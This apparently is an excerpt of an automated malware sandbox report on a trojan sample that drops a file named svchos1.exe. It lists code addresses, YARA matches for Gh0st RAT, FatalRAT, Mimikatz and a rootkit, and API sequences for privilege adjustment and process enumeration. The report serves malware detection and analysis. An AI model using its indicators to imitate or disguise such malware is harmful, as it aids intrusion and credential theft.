Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0348B7BB	28_2_0348B7BB
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034FF614	28_2_034FF614
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035156B4	28_2_035156B4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0348B949	28_2_0348B949
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0348B905	28_2_0348B905
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0348B927	28_2_0348B927
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03501994	28_2_03501994
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034B1984	28_2_034B1984
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0348B84F	28_2_0348B84F
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0348B874	28_2_0348B874
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0348B805	28_2_0348B805
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0348B82A	28_2_0348B82A
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0348B8E3	28_2_0348B8E3
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0348B899	28_2_0348B899
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0348B8BE	28_2_0348B8BE
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034DBF64	28_2_034DBF64
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034FBEA4	28_2_034FBEA4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03505EA4	28_2_03505EA4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03652280	28_2_03652280
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035C41D0	28_2_035C41D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0361C1F0	28_2_0361C1F0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036421F0	28_2_036421F0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0361A040	28_2_0361A040
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035F1000	28_2_035F1000
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03641010	28_2_03641010
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036187A0	28_2_036187A0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036396B0	28_2_036396B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03654690	28_2_03654690
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035E46A0	28_2_035E46A0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0363B520	28_2_0363B520
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03645520	28_2_03645520
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0361B5E0	28_2_0361B5E0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035CA590	28_2_035CA590
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0361A4F0	28_2_0361A4F0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035DA4C0	28_2_035DA4C0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0361BB60	28_2_0361BB60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03653A00	28_2_03653A00
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0363E9E0	28_2_0363E9E0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035EA9A0	28_2_035EA9A0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035E8E60	28_2_035E8E60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035E9E80	28_2_035E9E80
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03653D30	28_2_03653D30
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03654D30	28_2_03654D30
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0363EC90	28_2_0363EC90
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03A73369	28_2_03A73369
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_007282DD	29_2_007282DD
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_007C039C	29_2_007C039C
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_006DE4C7	29_2_006DE4C7
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_007367A8	29_2_007367A8
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_007B2EA7	29_2_007B2EA7
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0074B05D	29_2_0074B05D
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_00729379	29_2_00729379
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_007B5803	29_2_007B5803
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_00988405	29_2_00988405
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_009887FC	29_2_009887FC
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_009952E4	29_2_009952E4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_00983369	29_2_00983369
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0099B9A4	29_2_0099B9A4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0099BD04	29_2_0099BD04
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_01055560	29_2_01055560
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_010435E5	29_2_010435E5
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_010507C1	29_2_010507C1
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_01048681	29_2_01048681
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_01056832	29_2_01056832
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_01055A37	29_2_01055A37
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_01048A78	29_2_01048A78
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0104FDFC	29_2_0104FDFC
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0105BC20	29_2_0105BC20
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0105BF80	29_2_0105BF80
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_02A14384	29_2_02A14384
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029AB324	29_2_029AB324
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029FF364	29_2_029FF364
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029FA034	29_2_029FA034
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_02A15014	29_2_02A15014
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029A5024	29_2_029A5024
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029D9124	29_2_029D9124
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_02A156B4	29_2_02A156B4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_02A146B4	29_2_02A146B4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029FF614	29_2_029FF614
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0298B7BB	29_2_0298B7BB
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0298B7E0	29_2_0298B7E0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029A97E4	29_2_029A97E4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029DC4E4	29_2_029DC4E4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_02984B54	29_2_02984B54
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_02A02B74	29_2_02A02B74
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029DCB74	29_2_029DCB74
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0298B899	29_2_0298B899
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0298B8BE	29_2_0298B8BE
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0298B8E3	29_2_0298B8E3
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0298B805	29_2_0298B805
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029AA804	29_2_029AA804
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0298B82A	29_2_0298B82A
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0298B84F	29_2_0298B84F
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0298B874	29_2_0298B874
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029B1984	29_2_029B1984
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_02A01994	29_2_02A01994
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029DA9C4	29_2_029DA9C4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0298B905	29_2_0298B905
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0298B927	29_2_0298B927
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0298B949	29_2_0298B949
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_02A05EA4	29_2_02A05EA4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029FBEA4	29_2_029FBEA4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0299AE44	29_2_0299AE44
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029DAE74	29_2_029DAE74
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029DBF64	29_2_029DBF64
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_02A12C04	29_2_02A12C04
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03112280	29_2_03112280
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030841D0	29_2_030841D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_031021F0	29_2_031021F0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030DC1F0	29_2_030DC1F0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03101010	29_2_03101010
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030B1000	29_2_030B1000
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030DA040	29_2_030DA040
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030D87A0	29_2_030D87A0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03114690	29_2_03114690
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030A46A0	29_2_030A46A0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030F96B0	29_2_030F96B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030FB520	29_2_030FB520
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03105520	29_2_03105520
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0308A590	29_2_0308A590
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030DB5E0	29_2_030DB5E0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0309A4C0	29_2_0309A4C0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030DA4F0	29_2_030DA4F0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030DBB60	29_2_030DBB60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03113A00	29_2_03113A00
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030AA9A0	29_2_030AA9A0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030FE9E0	29_2_030FE9E0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030A8E60	29_2_030A8E60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030A9E80	29_2_030A9E80
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03113D30	29_2_03113D30
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03114D30	29_2_03114D30
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030FEC90	29_2_030FEC90

Source: C:\Users\user\Desktop\SystemProcess18.exe	Code function: String function: 03DE1DE4 appears 34 times
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: String function: 010435A0 appears 44 times
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: String function: 007B20B0 appears 62 times
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: String function: 007B1C38 appears 140 times
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: String function: 007B1C02 appears 48 times
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: String function: 007B1BCF appears 475 times
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: String function: 006BAEAD appears 34 times
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: String function: 00983324 appears 44 times

Source: SystemProcess18.exe, 00000000.00000000.1226334121.000000000021A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCCCC.exe8 vs SystemProcess18.exe
Source: SystemProcess18.exe, 00000003.00000000.1266441108.000000000021A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCCCC.exe8 vs SystemProcess18.exe

Source: SystemProcess18.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 28.2.svchos1.exe.36bcd38.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 29.2.svchos1.exe.317cd38.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 29.2.svchos1.exe.318c380.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.358cd04.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.357d6bc.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 29.2.svchos1.exe.2a7d6bc.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.36cc380.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 29.2.svchos1.exe.2a8cd04.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 29.2.svchos1.exe.317cd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.svchos1.exe.317cd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.svchos1.exe.317cd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 29.2.svchos1.exe.318c380.6.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.svchos1.exe.318c380.6.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.svchos1.exe.318c380.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 29.2.svchos1.exe.2a8cd04.4.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.svchos1.exe.2a8cd04.4.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.svchos1.exe.2a8cd04.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 29.2.svchos1.exe.2a7d6bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.svchos1.exe.2a7d6bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.svchos1.exe.2a7d6bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.357d6bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.357d6bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.357d6bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.36bcd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.36bcd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.36bcd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.358cd04.1.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.358cd04.1.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.358cd04.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.36cc380.4.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.36cc380.4.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.36cc380.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
Source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1006/40@2/2

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035E1B30 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	28_2_035E1B30
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035E9770 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	28_2_035E9770
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035DB7A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	28_2_035DB7A0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030A1B30 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	29_2_030A1B30
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030A9770 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	29_2_030A9770
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0309B7A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	29_2_0309B7A0

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035D4700 GetDiskFreeSpaceExA,LoadLibraryA,GetProcAddress,lstrcpy,GetDiskFreeSpaceExA,RegQueryValueExA,RegQueryValueExA,strchr,strncat,strncat,strncat,strchr,RegQueryValueExA,wsprintfA,RegQueryValueExA,RegEnumKeyExA,wsprintfA,wsprintfA,strchr,RegEnumValueA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcat,

28_2_035D4700

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035E1A50 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Sleep,

28_2_035E1A50

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_006C6673 CoInitialize,CoCreateInstance,

28_2_006C6673

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_0071D414 SelectObject,FindResourceW,LoadResource,LockResource,FreeResource,SizeofResource,

28_2_0071D414

Source: C:\Users\Public\Documents\MM\svchos1.exe

